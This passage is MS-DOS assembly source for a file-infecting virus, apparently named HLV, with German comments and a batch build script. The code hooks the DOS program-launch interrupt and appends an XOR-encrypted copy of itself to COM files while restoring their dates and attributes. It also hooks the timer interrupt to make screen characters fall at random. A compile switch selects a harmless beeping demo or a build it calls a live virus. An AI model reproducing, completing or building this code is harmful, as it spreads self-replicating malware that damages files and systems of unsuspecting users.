- JNZ _X_1 ; - _X_2: IN AL,DX ; - TEST AL,01 ; - JZ _X_2 ; - _X_3 LABEL NEAR ; - ENDM ;------; -SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; - IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; - IFNB <_X> ;------; - IFIDN <_X>, ; - PUSHF ; - ELSE ; - PUSH _X ; - ENDIF ; - ENDIF ; - ENDM ; - ENDM ;------; -REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; - IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; - IFNB <_X> ;------; - IFIDN <_X>, ; - POPF ; - ELSE ; - POP _X ; - ENDIF ; - ENDIF ; - ENDM ; - ENDM ; -MOV_S MACRO S1,S2 ; - PUSH S2 ; - POP S1 ; - ENDM ; - comment # -Ŀ - Start des Code-Segments, Segment Prefix Bytes werden n i c h t au- - tomatisch durch den Assembler erzeugt. - - # ; -TEXT SEGMENT ; - ASSUME CS:TEXT,DS:TEXT,ES:TEXT,SS:TEXT ; - comment # -Ŀ - Einige das Verstndnis erleichternde Definitionen. 
- - # ; -NearJmp EQU 0E9 ; -PORT_B_8259A EQU 20 ; -EOI_8259A EQU 20 ; -PORT_B_8255 EQU 61 ; -FIRSTCONST EQU 0131 ; -FIRSTBASE EQU FIRSTCONST - OFFSET XI_001 ;-----; -FIRSTBASE2 EQU (FIRSTCONST + OFFSET XI_005 - XI_001) ; -DeCrptd EQU 0 ;-----; -EnCrptd EQU 1 ; -BIOSDATASEG EQU 040 ; -MonoBase EQU 0B000 ; -ColorBase EQU 0B800 ; -B_VIDPAGE EQU THIS WORD + 04E ; -B_TIMERVAR EQU THIS WORD + 06C ; -TimerInt EQU 1C ; -DOS EQU 21 ; -DOS_multi EQU 2F ; -MS_SetDTA EQU 1A ; - DTA_in_PSP EQU 80 ; -MS_SetInt EQU 25 ; -MS_GetDateTime EQU 2A ; -MS_GetVer EQU 30 ; - DOS_v_02 EQU 2 ; -MS_GetInt EQU 35 ; -MS_Open EQU 3Dh ; - Read_Only EQU 0 ; - Read_Write EQU 2 ; -MS_Close EQU 3E ; -MS_Read EQU 3F ; -MS_Write EQU 40 ; -MS_MoveFP EQU 42 ; - OfsFrmTop EQU 0 ; - OfsFrmEnd EQU 02 ; -MS_GetFileAttr EQU 4300 ; -MS_SetFileAttr EQU 4301 ; - Attr_A EQU 20 ; - Attr_SHR EQU 7 ; - Attr_ASHR EQU Attr_A OR Attr_SHR ; -MS_AllocMem EQU 48 ; -MS_ReleaseMem EQU 49 ; - MemCBsig EQU THIS BYTE + 0 ; - MemCBowned EQU THIS WORD + 1 ; - MemCBsize EQU THIS WORD + 3 ; -MS_Exec EQU 4Bh ; - MS_Exec_SF0 EQU 0 ; - Virus_fun EQU 0ffh ; - Virus_Sig EQU 55AA ; -MS_SetPSP EQU 50 ; - PSPsize EQU 00100 ; - PSPCurCom EQU THIS WORD + 016 ; - PSPEnv EQU THIS WORD + 02C ; - PSP_SegJFB EQU THIS WORD + 036 ; - NoEnv EQU 0 ; -MS_GetFileDate EQU 5700 ; -MS_SetFileDate EQU 5701 ; -PSP_100 EQU THIS WORD + PSPsize ; -PSP_102 EQU THIS BYTE + PSPsize + 2 ; - comment # -Ŀ - Ab hier wird Objektcode erzeugt, Datenbereich Nr. 1. - - # ; -Crypt1 DB 0 ; -Crypt2 EQU OFFSET Crypt1 + FIRSTBASE ; -Crypt3 EQU Crypt1 + PSPsize ; - comment # -Ŀ - Einsprungstelle, entschlsseln des Virus falls notwendig. 
- - # ; -XI_000: CLI ; - MOV BP,SP ; - CALL XI_001 ; -XI_001: POP BX ; - SUB BX,FIRSTCONST ; - TEST BYTE PTR CS:[BX+Crypt2],EnCrptd ; - JZ XI_003 ; - LEA SI,[BX + XR_000] ; - MOV SP,OFFSET EOFC-OFFSET XI_003 ; -XI_002: XOR [SI],SI ; - XOR [SI],SP ; - INC SI ; - DEC SP ; - JNZ XI_002 ; -XI_003 LABEL NEAR ; - XR_000 EQU OFFSET XI_003 + FIRSTBASE ; - XR_001 EQU XI_003 + PSPsize ; - MOV SP,BP ; - JMP SHORT XI_004 ; - comment # -Ŀ - Datenbereich 2. - - # ; - XD_000 DW PSPsize ; -Disp_to_com_1 EQU OFFSET XD_000 + FIRSTBASE ; - XD_001 DW 9090 ; -Disp_to_com_2 EQU OFFSET XD_001 + FIRSTBASE ; - XD_002 DW 9090 ; -Initial_AX EQU OFFSET XD_002 + FIRSTBASE ; - XD_003 EQU THIS WORD ; - XD_004 EQU THIS BYTE + 2 ; - NOP ; - NOP ; - NOP ; -Org1stInstr_s1 EQU OFFSET XD_003 + FIRSTBASE ; -Org1stInstr_t1 EQU XD_003 + PSPsize ; -Org1stInstr_t2 EQU XD_003 + PSPsize + 1 ; -Org1stInstr_s2 EQU OFFSET XD_004 + FIRSTBASE ; - XD_005 DW 2 dup ( 9090 ) ; -Org_Int_1C EQU XD_005 + PSPsize ; - XD_006 DW 2 dup ( 9090 ) ; -Org_int_21s EQU OFFSET XD_006 + FIRSTBASE ; -Org_Int_21t EQU XD_006 + PSPsize ; - ; -IF SWITCHABLE ; - ; - XD_007 DW 2 dup ( 9090 ) ; -Org_Int_2F EQU XD_007 + PSPsize ; - XD_008 DB 5, "_HLV_ " ; -Cmd_2F EQU XD_008 + PSPsize ; - XD_009 DB 'HLV is on',0Dh,0Ah,'$' ; -Msg_On EQU XD_009 + PSPsize ; - XD_010 DB 'HLV is off',0Dh,0Ah,'$' ; -Msg_Off EQU XD_010 + PSPsize ; - ; -ENDIF ; - ; - XD_011 DW 9090 ; -File_Attributes EQU XD_011 + PSPsize ; - XD_012 DW 9090 ; -File_Date EQU XD_012 + PSPsize ; - XD_013 DW 9090 ; -File_Time EQU XD_013 + PSPsize ; - XD_014 DW 2 dup ( 9090 ) ; -Pathname EQU XD_014 + PSPsize ; - XD_015 DW 2 dup ( 9090 ) ; -File_Size_lsb EQU XD_015 + PSPsize ; -File_Size_msb EQU XD_015 + PSPsize + 2 ; - XD_016 DB NearJmp ; -FirstOpCode_1 EQU XD_016 + PSPsize ; - XD_017 DW 9090 ; -FirstOpCode_2 EQU XD_017 + PSPsize ; - XD_018 DB 90 ; -Num_of_Col EQU XD_018 + PSPsize ; - XD_019 DB 90 ; -Last_Line EQU XD_019 + PSPsize ; - XD_020 DB 90 ; -Prevent_Snow? 
EQU XD_020 + PSPsize ; -Last_Pair EQU THIS WORD + PSPsize ; - XD_021 DB 90 ; - XD_022 DB 90 ; -Last_Char EQU XD_021 + PSPsize ; -Last_Attr EQU XD_022 + PSPsize ; -RecTyp1 RECORD ExtCom:1, Recf_1:1, R_in_1c:1 ; - XD_023 RecTyp1 <0,0,0> ; -ISR_Flags EQU XD_023 + PSPsize ; - XD_024 DW 9090 ; -Seg_of_VRAM EQU XD_024 + PSPsize ; - XD_025 DW 9090 ; -Page_offset EQU XD_025 + PSPsize ; - XD_026 DW 9090 ; -Speed EQU XD_026 + PSPsize ; - XD_027 DW 9090 ; -XR_002 EQU XD_027 + PSPsize ; - XD_028 DW 9090 ; -XR_003 EQU XD_028 + PSPsize ; - XD_029 DW 9090 ; -Num_of_char EQU XD_029 + PSPsize ; - XD_030 DW 9090 ; -XR_004 EQU XD_030 + PSPsize ; - XD_031 DW 7 dup ( 9090 ) ; -FirstRandom EQU XD_031 + PSPsize ; -LastRandom EQU This Word + PSPsize ; - DW 9090 ; - comment # -Ŀ - Installieren u. relozieren falls notwendig. - - # ; -XI_004: CALL XI_005 ; -XI_005 LABEL NEAR ; -XR_005 EQU XI_005 + PSPsize ; - POP BX ; - SUB BX,FIRSTBASE2 ; - MOV CS:[BX+Disp_to_com_2],CS ; - MOV CS:[BX+Initial_AX],AX ; - MOV AX,CS:[BX+Org1stInstr_s1] ; - MOV [PSP_100],AX ; - MOV AL,CS:[BX+Org1stInstr_s2] ; - MOV [PSP_102],AL ; - PUSH BX ; - MOV AH,MS_GetVer ; - MSDOS ; - POP BX ; - CMP AL,DOS_v_02 ; - JB XI_006 ; - MOV AX,MS_Exec * 100 + Virus_fun ; - XOR DI,DI ; - XOR SI,SI ; - MSDOS ; - CMP DI,Virus_sig ; - JNZ XI_007 ; -XI_006: STI ; - MOV_S ES,DS ; - MOV AX,CS:[BX+Initial_AX] ; - JMP DWORD PTR CS:[BX+Disp_to_com_1] ; -XI_007: PUSH BX ; - MOV AX,MS_GetInt * 100 + DOS ; - MSDOS ; - MOV AX,BX ; - POP BX ; - MOV CS:[BX+Org_int_21s],AX ; - MOV CS:[BX+Org_int_21s + 2],ES ;------------; - MOV AX, (OFFSET EOFC - OFFSET Crypt1) SHR 4 + 11 ; - MOV BP,CS ;------------; - DEC BP ; - MOV ES,BP ; - MOV SI,CS:[PSPCurCom] ; - MOV ES:[MemCBowned],SI ; - MOV DX,ES:[MemCBsize] ; - MOV ES:[MemCBsize],AX ; - MOV ES:[MemCBsig],'M' ; - SUB DX,AX ; - DEC DX ; - INC BP ; - ADD BP,AX ; - INC BP ; - MOV ES,BP ; - PUSH BX ; - MOV AH,MS_SetPSP ; - MOV BX,BP ; - MSDOS ; - POP BX ; - XOR DI,DI ; - MOV_S SS,ES ; - PUSH DI ; - LEA 
DI,[BX+XR_010] ; - MOV SI,DI ; - MOV CX,OFFSET EOFC ; - STD ; - REPZ MOVSB ; - PUSH ES ; - LEA CX,[BX+XR_006] ; - PUSH CX ; - RETF ; -XI_008 LABEL NEAR ; -XR_006 EQU OFFSET XI_008 + FIRSTBASE ; - MOV CS:[BX+Disp_to_com_2],CS ; - LEA CX,[BX+Crypt2] ; - REPZ MOVSB ; - MOV CS:[PSP_SegJFB],CS ; - DEC BP ; - MOV ES,BP ; - MOV ES:[MemCBsize],DX ; - MOV ES:[MemCBsig],'Z' ; - MOV ES:[MemCBowned],CS ; - INC BP ; - MOV ES,BP ; - MOV_S ES,DS ; - MOV_S DS,CS ; - LEA SI,[BX+Crypt2] ; - MOV DI,PSPsize ; - MOV CX,OFFSET EOFC ; - CLD ; - REPZ MOVSB ; - PUSH ES ; - LEA AX,[XR_007] ; - PUSH AX ; - RETF ; -XI_009 LABEL NEAR ; -XR_007 EQU XI_009 + PSPsize ; - MOV CS:[PSPEnv],NoEnv ; - MOV CS:[PSPCurCom],CS ; - PUSH DS ; - LEA DX,[XR_008] ; - MOV_S DS,CS ; - MOV AX,MS_SetInt * 100 + DOS ; - MSDOS ; - POP DS ; - MOV AH,MS_SetDTA ; - MOV DX,DTA_in_PSP ; - MSDOS ; - SAVE DS,ES,SI,DI,CX ; - MOV_S ES,CS ; - MOV CX,BIOSDATASEG ; - MOV DS,CX ; - MOV DI,OFFSET FirstRandom ; - MOV SI,OFFSET B_TIMERVAR ; - MOV CL,8 ; - CLD ; - REPZ MOVSW ; - REST CX,DI,SI,ES,DS ; - ; -IF SWITCHABLE ; - ; - PUSH DS ; - MOV AX,MS_GetInt * 100 + DOS_multi ; - MSDOS ; - MOV CS:[Org_Int_2F],BX ; - MOV CS:[Org_Int_2F + 2],ES ; - MOV AX,MS_SetInt * 100 + DOS_multi ; - MOV DX,offset Int_2F_ISR ; - MOV_S DS,CS ; - MSDOS ; - POP DS ; - ; -ENDIF ; - ; - OR CS:[ISR_Flags],MASK ExtCom ; - MOV AH,MS_GetDateTime ; - MSDOS ; - CMP CX,YEAR ; - JZ XI_010 ; - JMP SHORT XI_011 ; -XI_010: CMP DH,MONTH ; - JB XI_011 ; - AND CS:[ISR_Flags],NOT MASK ExtCom ; -XI_011: MOV AX,1518 ; - CALL Random ; - INC AX ; - MOV CS:[XR_002],AX ; - MOV CS:[XR_003],AX ; - MOV CS:[XR_004],1 ; - MOV AX,MS_GetInt * 100 + TimerInt ; - MSDOS ; - MOV CS:[Org_Int_1C],BX ; - MOV CS:[Org_Int_1C + 2],ES ; - PUSH DS ; - MOV AX,MS_SetInt * 100 + TimerInt ; - MOV DX,OFFSET XR_009 ; - MOV_S DS,CS ; - MSDOS ; - POP DS ; -XI_012: MOV BX,OFFSET XR_005 - (FIRSTBASE2) ; - JMP XI_006 ; - comment # -Ŀ - Neue Interrupt 21(h) Behandlungsroutine ( verndert Exec - Funktion ). 
- - # ; -XI_013 LABEL NEAR ; -XR_008 EQU XI_013 + PSPsize ; - CMP AH,MS_Exec ; - JZ XI_016 ; -XI_014: JMP DWORD PTR CS:[Org_Int_21t] ; -XI_015: MOV DI,Virus_Sig ; - LES AX,CS:DWORD PTR [Org_Int_21t] ; - MOV DX,CS ; - IRET ; -XI_016: CMP AL,Virus_fun ; - JZ XI_015 ; - CMP AL,MS_Exec_SF0 ; - JNZ XI_014 ; - SAVE F,AX,BX,CX,DX,SI,DI,BP,ES,DS ; - MOV CS:[Pathname],DX ; - MOV CS:[Pathname + 2],DS ; - MOV_S ES,CS ; - MOV AX,MS_Open * 100 + Read_Only ; - MSDOS ; - JB XI_018 ; - MOV BX,AX ; - MOV AX,MS_GetFileDate ; - MSDOS ; - MOV CS:[File_Date],DX ; - MOV CS:[File_Time],CX ; - MOV AH,MS_Read ; - MOV_S DS,CS ; - MOV DX,OFFSET Org1stInstr_t1 ; - MOV CX,3 ; - MSDOS ; - JB XI_018 ; - CMP AX,CX ; - JNZ XI_018 ; - MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - MOV CS:[File_Size_lsb],AX ; - MOV CS:[File_Size_msb],DX ; - MOV AH,MS_Close ; - MSDOS ;---------------; - CMP CS:[Org1stInstr_t1], 'Z' * 100 + 'M' ; - JNZ XI_017 ; - JMP XI_025 ; -XI_017: CMP CS:[File_Size_msb],+0 ; - JA XI_018 ; - CMP CS:[File_Size_lsb],offset Crypt1-offset EOFC-20 ; - JBE XI_019 ; -XI_018: JMP XI_025 ; -XI_019: CMP BYTE PTR CS:[Org1stInstr_t1],NearJmp ; - JNZ XI_020 ; - MOV AX,CS:[File_Size_lsb] ; - ADD AX,OFFSET Crypt1 - offset EOFC - 2 ; - CMP AX,CS:[Org1stInstr_t2] ;---------------; - JZ XI_018 ; - ; -IF DEMO ; -XI_020: CALL DEMO_Infect ; - JMP XI_025 ; - ; -IF2 ;----------------; -%Out ͻ -%Out Demo - Version, -%Out k e i n Virus. 
-ENDIF ;----------------; -ELSE ; -IFDEF _DANGER ; -XI_020 MOV AX,MS_GetFileAttr ; - LDS DX,CS:DWORD PTR [Pathname] ; - MSDOS ; - JB XI_018 ; - MOV CS:[File_Attributes],CX ; - XOR CL,Attr_A ; - TEST CL,Attr_ASHR ; - JZ XI_021 ; - MOV AX,MS_SetFileAttr ; - XOR CX,CX ; - MSDOS ; - JB XI_018 ; -XI_021: MOV AX,MS_Open * 100 + Read_Write ; - MSDOS ; - JB XI_018 ; - MOV BX,AX ; - MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - CALL Append_Virus ; - JNB XI_022 ; - MOV AX,MS_MoveFP * 100 + OfsFrmTop ; - MOV CX,CS:[File_Size_msb] ; - MOV DX,CS:[File_Size_lsb] ; - MSDOS ; - MOV AH,MS_Write ; - XOR CX,CX ; - MSDOS ; - JMP SHORT XI_023 ; -XI_022: MOV AX,MS_MoveFP * 100 + OfsFrmTop ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - JB XI_023 ; - MOV AX,CS:[File_Size_lsb] ; - ADD AX,-2 ; - MOV CS:[FirstOpCode_2],AX ; - MOV AH,MS_Write ; - MOV DX,OFFSET FirstOpCode_1 ; - MOV CX,3 ; - MSDOS ; -XI_023: MOV AX,MS_SetFileDate ; - MOV DX,CS:[File_Date] ; - MOV CX,CS:[File_Time] ; - MSDOS ; - MOV AH,MS_Close ; - MSDOS ; - MOV CX,CS:[File_Attributes] ; - TEST CL,Attr_SHR ; - JNZ XI_024 ; - TEST CL,Attr_A ; - JNZ XI_025 ; -XI_024: MOV AX,MS_SetFileAttr ; - LDS DX,CS:DWORD PTR [Pathname] ; - MSDOS ; -IF2 ;----------------; -%Out ͻ -%Out KEIN DEMO, -%Out scharfer Virus. -ENDIF ; -ELSE ; - .ERR ; -ENDIF ; -ENDIF ; -IF SWITCHABLE ; -IF2 ; -%Out ͻ -%Out Neuer interner MSDOS Befehl '_HLV_' ! -ENDIF ; -ELSE ; -IF2 ; -%Out ͻ -%Out Kommando '_HLV_' nicht implementiert. -ENDIF ; -ENDIF ; -DISPNUM MACRO nu,nuxx ; -%Out (Monat - Jahr) nu - nuxx -ENDM ; -IF2 ; -%Out Bis zum Jahresende aktiv ab: -.radix 10 ; -DISPNUM %MONTH,%YEAR ; -.radix 16 ; -%Out ͼ -endif ; -XI_025: REST DS,ES,BP,DI,SI,DX,CX,BX,AX,F ;----------------; - JMP XI_014 ; -IF DEMO ; - ; - comment # -Ŀ - Statt APPEND in der DEMO - Version aufgerufene Prozedur. 
- - # ; -DEMO_INFECT PROC NEAR ; - push ax ; - push cx ; - in al,61 ; - or al,3 ; - out 61,al ; - mov al,0b6 ; - out 43,al ; - mov cx,0a ; -XI_026: dec cx ; - jz XI_030 ; -XI_027: mov ax,200d ; -XI_028: dec ax ; - cmp ax,100d ; - jz XI_031 ; - push ax ; - out 42,al ; - push cx ; - mov cx,150d ; -XI_029: nop ; - loop XI_029 ; - pop cx ; - mov al,ah ; - out 42,al ; - pop ax ; - jmp XI_028 ; -XI_030: in al,61 ; - and al,0fc ; - out 61,al ; - pop cx ; - pop ax ; - ret ; -XI_031: inc ax ; - cmp ax,600d ; - jz XI_026 ; - push ax ; - out 42,al ; - push cx ; - mov cx,150d ; -XI_032: nop ; - loop XI_032 ; - pop cx ; - mov al,ah ; - out 42,al ; - pop ax ; - jmp XI_031 ; -DEMO_INFECT ENDP ; - ; -ELSE ; - comment # -Ŀ - Append Virus - von der Int21ISR aufgerufene Infektions-Prozdur - - # ; -Append_Virus PROC NEAR ; - SAVE ES,BX ; - MOV AH,MS_AllocMem ;----------; - MOV BX,(OFFSET EOFC - OFFSET Crypt1) SHR 4 + 1 ; - MSDOS ;----------; - POP BX ; - JNB XI_034 ; -XI_033: STC ; - POP ES ; - RET ; -XI_034: MOV CS:[Crypt3],EnCrptd ; - MOV ES,AX ; - MOV_S DS,CS ; - XOR DI,DI ; - MOV SI,PSPsize ; - MOV CX,OFFSET EOFC ; - CLD ; - REPZ MOVSB ; - MOV DI,OFFSET XI_003 ; - MOV SI,OFFSET XR_001 ; - ADD SI,[File_Size_lsb] ; - MOV CX,OFFSET EOFC - OFFSET XI_003 ; -XI_035: XOR ES:[DI],SI ; - XOR ES:[DI],CX ; - INC DI ; - INC SI ; - LOOP XI_035 ; - MOV DS,AX ; - MOV AH,MS_Write ; - XOR DX,DX ; - MOV CX,OFFSET EOFC ; - MSDOS ; - SAVE F,AX ; - MOV AH,MS_ReleaseMem ; - MSDOS ; - REST AX,F ; - MOV_S DS,CS ; - JB XI_033 ; - CMP AX,CX ; - JNZ XI_033 ; - POP ES ; - CLC ; - RET ; -Append_Virus ENDP ; - ; -ENDIF ; - comment # -Ŀ - 'Zufallszahlen' - Generator. 
- - # ; -Random PROC NEAR ; - SAVE DS ; - MOV_S DS,CS ; - SAVE BX,CX,DX,AX ; - MOV CX,7 ; - MOV BX,offset LastRandom ; - PUSH [BX] ; -XI_036: MOV AX,[BX-02] ; - ADC [BX],AX ; - DEC BX ; - DEC BX ; - LOOP XI_036 ; - POP AX ; - ADC [BX],AX ; - MOV DX,[BX] ; - POP AX ; - OR AX,AX ; - JZ XI_037 ; - MUL DX ; -XI_037: MOV AX,DX ; - REST DX,CX,BX,DS ; - RET ; -Random ENDP ; - comment # -Ŀ - Zeichen und Attribut aus Videospeicher auslesen. - - # ; -Load_from_VRAM PROC NEAR ; - SAVE SI,DS,DX ; - MOV AL,DH ; - MUL [Num_of_Col] ; - MOV DH,0 ; - ADD AX,DX ; - SHL AX,1 ; - ADD AX,[Page_offset] ; - MOV SI,AX ; - TEST [Prevent_Snow?],-1 ; - MOV DS,[Seg_of_VRAM] ; - JZ XI_038 ; - Wait_HRI_or_VRI ; -XI_038: LODSW ; - STI ; - REST DX,DS,SI ; - RET ; -Load_from_VRAM ENDP ; - comment # -Ŀ - Zeichen und Attribut (AX) in den Videospeicher schreiben. - - # ; -Write_to_VRAM PROC NEAR ; - SAVE DI,ES,DX,BX ; - MOV BX,AX ; - MOV AL,DH ; - MUL [Num_of_Col] ; - MOV DH,0 ; - ADD AX,DX ; - SHL AX,1 ; - ADD AX,[Page_offset] ; - MOV DI,AX ; - TEST [Prevent_Snow?],-1 ; - MOV ES,[Seg_of_VRAM] ; - JZ XI_039 ; - Wait_HRI_or_VRI ; -XI_039: MOV AX,BX ; - STOSB ; - STI ; - REST BX,DX,ES,DI ; - RET ; -Write_to_VRAM ENDP ; - comment # -Ŀ - Bit 0 von Port B des 8255 Chips zurcksetzen (IO-Adresse : &H61 ). - - # ; -Toggle_Speaker PROC NEAR ; - PUSH AX ; - IN AL,PORT_B_8255 ; - XOR AL,02 ; - AND AL,0FE ; - OUT PORT_B_8255,AL ; - POP AX ; - RET ; -Toggle_Speaker ENDP ; - comment # -Ŀ - CF gesetzt, wenn AL ein nicht darstellbares Zeichen enthlt. - - # ; -Is_it_blank_? PROC NEAR ; - CMP AL,0 ; - JZ XI_040 ; - CMP AL,20 ; - JZ XI_040 ; - CMP AL,-1 ; - JZ XI_040 ; - CLC ; - RET ; -XI_040: STC ; - RET ; -Is_it_blank_? ENDP ; - comment # -Ŀ - CF gesetzt, wenn AL ein Zeichen aus dem Linienzeichensatz enthlt. - - # ; -Spec_Graphik? PROC NEAR ; - CMP AL,0B0 ; - JB XI_041 ; - CMP AL,0DF ; - JA XI_041 ; - STC ; - RET ; -XI_041: CLC ; - RET ; -Spec_Graphik? 
ENDP ; - comment # -Ŀ - Geschwindigkeit der Maschine ( zur Verwendung in DELAY ) ermitteln. - - # ; -GetSysSpeed PROC NEAR ; - PUSH DS ; - MOV AX,BIOSDATASEG ; - MOV DS,AX ; - STI ; - MOV AX,[B_TIMERVAR] ; -XI_042: CMP AX,[B_TIMERVAR] ; - JZ XI_042 ; - XOR CX,CX ; - MOV AX,[B_TIMERVAR] ; -XI_043: INC CX ; - JZ XI_045 ; - CMP AX,[B_TIMERVAR] ; - JZ XI_043 ; -XI_044: POP DS ; - MOV AX,CX ; - XOR DX,DX ; - MOV CX,0F ; - DIV CX ; - MOV CS:[Speed],AX ; - RET ; -XI_045: DEC CX ; - JMP XI_044 ; -GetSysSpeed ENDP ; - comment # -Ŀ - Verzgern ( Verzgerungszeit ist kaum maschinenabhngig ). - - # ; -Delay PROC NEAR ; - PUSH CX ; -XI_046: PUSH CX ; - MOV CX,[Speed] ; -XI_047: LOOP XI_047 ; - POP CX ; - LOOP XI_046 ; - POP CX ; - RET ; -Delay ENDP ; - comment # -Ŀ - Eine neue Interrupt 1C(h) Behandlungsroutine. - - # ; -XI_048 LABEL NEAR ; -XR_009 EQU XI_048 + PSPsize ;----------; - TEST CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom ; - JZ XI_049 ;----------; - JMP XI_067 ; -XI_049: OR CS:[ISR_Flags],MASK R_in_1c ; - DEC CS:[XR_002] ; - JZ XI_050 ; - JMP XI_066 ; -XI_050: SAVE DS,ES ; - MOV_S DS,CS ; - MOV_S ES,CS ; - SAVE AX,BX,CX,DX,SI,DI,BP ; - MOV AL,EOI_8259A ; - OUT PORT_B_8259A,AL ; - MOV AX,[XR_003] ; - CMP AX,0438 ; - JNB XI_051 ; - MOV AX,0438 ; -XI_051: CALL Random ; - INC AX ; - MOV [XR_002],AX ; - MOV [XR_003],AX ; - PUSH DS ; - MOV AX,BIOSDATASEG ; - MOV DS,AX ; - MOV AX,[B_VidPage] ; - POP DS ; - MOV [Page_offset],AX ; - MOV [Last_Line],18 ; - MOV DL,-1 ; - MOV AX,1130 ; - MOV BH,0 ; - SAVE ES,BP ; - INT 10 ; - REST BP,ES ; - CMP DL,-1 ; - JZ XI_052 ; - MOV [Last_Line],DL ; -XI_052: CALL GetSysSpeed ; - MOV AH,0F ; - INT 10 ; - MOV [Num_of_Col],AH ; - MOV [Prevent_Snow?],0 ; - MOV [Seg_of_VRAM],MonoBase ; - CMP AL,07 ; - JZ XI_054 ; - JB XI_053 ; - JMP XI_064 ; -XI_053: MOV [Seg_of_VRAM],ColorBase ; - CMP AL,03 ; - JA XI_054 ; - CMP AL,02 ; - JB XI_054 ; - MOV [Prevent_Snow?],01 ; - MOV AL,[Last_Line] ; - INC AL ; - MUL [Num_of_Col] ; - MOV [Num_of_char],AX ; - MOV 
AX,[XR_004] ; - CMP AX,[Num_of_char] ; - JBE XI_054 ; - MOV AX,[Num_of_char] ; -XI_054: CALL Random ; - INC AX ; - MOV SI,AX ; -XI_055: XOR DI,DI ; -XI_056: INC DI ; - MOV AX,[Num_of_char] ; - SHL AX,1 ; - CMP DI,AX ; - JBE XI_057 ; - JMP XI_064 ; -XI_057: OR [ISR_Flags],MASK Recf_1 ; - MOV AL,[Num_of_Col] ; - MOV AH,0 ; - CALL Random ; - MOV DL,AL ; - MOV AL,[Last_Line] ; - MOV AH,0 ; - CALL Random ; - MOV DH,AL ; - CALL Load_from_VRAM ; - CALL Is_it_blank_? ; - JB XI_056 ; - CALL Spec_Graphik? ; - JB XI_056 ; - MOV [Last_Pair],AX ; - MOV CL,[Last_Line] ; - MOV CH,0 ; -XI_058: INC DH ; - CMP DH,[Last_Line] ; - JA XI_062 ; - CALL Load_from_VRAM ; - CMP AH,[Last_Attr] ; - JNZ XI_062 ; - CALL Is_it_blank_? ; - JB XI_060 ; -XI_059: CALL Spec_Graphik? ; - JB XI_062 ; - INC DH ; - CMP DH,[Last_Line] ; - JA XI_062 ; - CALL Load_from_VRAM ; - CMP AH,[Last_Attr] ; - JNZ XI_062 ; - CALL Is_it_blank_? ; - JNB XI_059 ; - CALL Toggle_Speaker ; - DEC DH ; - CALL Load_from_VRAM ; - MOV [Last_Char],AL ; - INC DH ; -XI_060: AND [ISR_Flags],NOT MASK Recf_1 ; - DEC DH ; - MOV AL,' ' ; - CALL Write_to_VRAM ; - INC DH ; - MOV AL,[Last_Char] ; - CALL Write_to_VRAM ; - JCXZ XI_061 ; - CALL Delay ; - DEC CX ; -XI_061: JMP XI_058 ; -XI_062: TEST [ISR_Flags],MASK Recf_1 ; - JZ XI_063 ; - JMP XI_056 ; -XI_063: CALL Toggle_Speaker ; - DEC SI ; - JZ XI_064 ; - JMP XI_055 ; -XI_064: IN AL,PORT_B_8255 ; - AND AL,0FC ; - OUT PORT_B_8255,AL ; - MOV AX,3 ; - CALL Random ; - INC AX ; - MUL [XR_004] ; - JNB XI_065 ; - MOV AX,-1 ; -XI_065: MOV [XR_004],AX ; - REST BP,DI,SI,DX,CX,BX,AX,ES,DS ; -XI_066: AND CS:[ISR_Flags],NOT MASK R_in_1c ; -XI_067: JMP DWORD PTR CS:[Org_Int_1C] ; - ; -IF SWITCHABLE ; - ; - comment # -Ŀ - Implementierung eines neuen in CMD_2F definierten internen Befehls. 
- - # ; -XI_068 Label Near ; -Int_2F_ISR EQU XI_068 + PSPsize ; - CMP AH,0AEH ; - JNZ Int_2F_end ; - CMP DX,-1 ; - JNZ Int_2F_end ; - CMP AL,0 ; - JNZ Int_2F_2nd ; - CALL Decode_2F ; - JNZ Int_2F_end ; - DEC AL ; - IRET ; -Int_2F_2nd: CMP AL,1 ; - JNZ Int_2F_end ; - CALL Decode_2F ; - JNZ Int_2F_end ; - SAVE DS,DX,AX ; - MOV_S DS,CS ; - XOR [ISR_Flags],MASK ExtCom ; - MOV DX,OFFSET MSG_ON ; - TEST [ISR_Flags],MASK ExtCom ; - JZ XI_069 ; - MOV DX,OFFSET MSG_OFF ; -XI_069: MOV AH,9 ; - MSDOS ; - REST AX,DX,DS ; - AND BYTE PTR [SI],0 ; - IRET ; -Int_2F_end: JMP DWORD PTR CS:[Org_Int_2F] ; - comment # -Ŀ - berprfen, ob der in CMD_2F definierte Befehl angesprochen wurde. - - # ; -Decode_2F PROC NEAR ; - SAVE SI,DI,ES,CX ; - MOV CX,05 ; - MOV_S ES,CS ; - MOV DI,OFFSET Cmd_2F ; - CLD ; - REPE CMPSW ; - REST CX,ES,DI,SI ; - RET ; -Decode_2F ENDP ; - ; -ENDIF ; - comment # -Ŀ - Okay, das war's. Zum Schlu noch einige Definitionen. - - # ; -EOFC EQU THIS WORD ; -XR_010 EQU OFFSET EOFC - 1 + FIRSTBASE ; -TEXT ENDS ; -IF2 ;----------------; -%Out -%Out (C) 1990 164A12565AA18213165556D3125C4B962712 ͼ -ENDIF ; -comment # -ͻ - - So knnte ein Batch - Makefile aussehen : - - @cls - @if %1.==. goto nopar - @if not exist %1.asm goto noasm - @ctty nul - @del %1.obj - @del %1.lst - @del %1.crf - @del %1.ref - @del %1.map - @del %1.exe - @del %1.bin - @del _HLV_.COM - @ctty con - @masm /b63 %1,,%1,%1 %2 %3 %4; - @if not exist %1.obj goto masm_err - @link %1,,%1; - @if not exist %1.exe goto link_err - @exe2bin %1; - @if not exist %1.bin goto exe2_err - @cref %1; - @if not exist %1.ref goto cref_err - @echo >> %1.lst - @copy %1.lst+%1.map+%1.ref %1.t > nul - @del %1.lst > nul - @ren %1.t %1.lst > nul - @del %1.obj > nul - @del %1.crf > nul - @del %1.ref > nul - @del %1.map > nul - @del %1.exe > nul - @echo n %1.bin > md.inp - @echo l 11f >> md.inp - @echo a 110 >> md.inp - @echo add cx,20 >> md.inp - @echo. 
